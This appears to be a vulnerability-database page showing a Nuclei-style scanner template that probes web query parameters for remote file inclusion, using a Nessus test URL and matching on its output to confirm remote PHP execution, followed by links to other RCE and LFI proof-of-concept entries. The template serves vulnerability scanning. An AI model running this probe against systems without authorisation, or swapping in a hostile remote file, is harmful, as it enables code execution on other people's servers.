generic-rfi: Generic Remote File Inclusion

漏洞描述

PoC代码[已公开]

id: generic-rfi

info:
  name: Generic Remote File Inclusion
  author: m4lwhere
  severity: high
  reference:
    - https://www.invicti.com/learn/remote-file-inclusion-rfi/
  metadata:
    max-request: 1
  tags: rfi,dast,oast,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      rfi:
        - "https://rfi.nessus.org/rfi.txt"

    fuzzing:
      - part: query
        mode: single
        fuzz:
          - "{{rfi}}"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body  # Confirms the PHP was executed
        words:
          - "NessusCodeExecTest"
# digest: 4b0a004830460221008b6ae75bff51d0f717fa022b5a9f6f75ac545b873262f391be1b844bddb24d67022100f8b9d9ccf60276b6eb0ab6d0bda976c53f8218b73f2b78012d8c15daae36b43a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• POC CVE-2019-10647: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
• POC CVE-2021-2135: Oracle WebLogic Server - Remote Code Execution
• POC CVE-2021-23394: elFinder < 2.1.58 - Remote Code Execution
• POC CVE-2025-34299: Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution
• POC CVE-2025-55182: React Server Components - Remote Code Execution
• POC CVE-2017-5983: JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)
• POC CVE-2020-11732: Media Library Assistant < 2.82 - Unauthenticated Limited Local File Inclusion
• POC CVE-2023-5815: News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion
• POC CVE-2021-34427: Eclipse BIRT Viewer - Remote Code Execution
• POC CVE-2024-53900: Mongoose < 8.8.3 - Remote Code Execution
• POC CVE-2025-31486: Vite server.fs.deny Bypass - Local File Inclusion
• POC CVE-2025-8943: Flowise < 3.0.1 - Remote Command Execution
• POC CVE-2021-41419: QVIS NVR/DVR - Remote Code Execution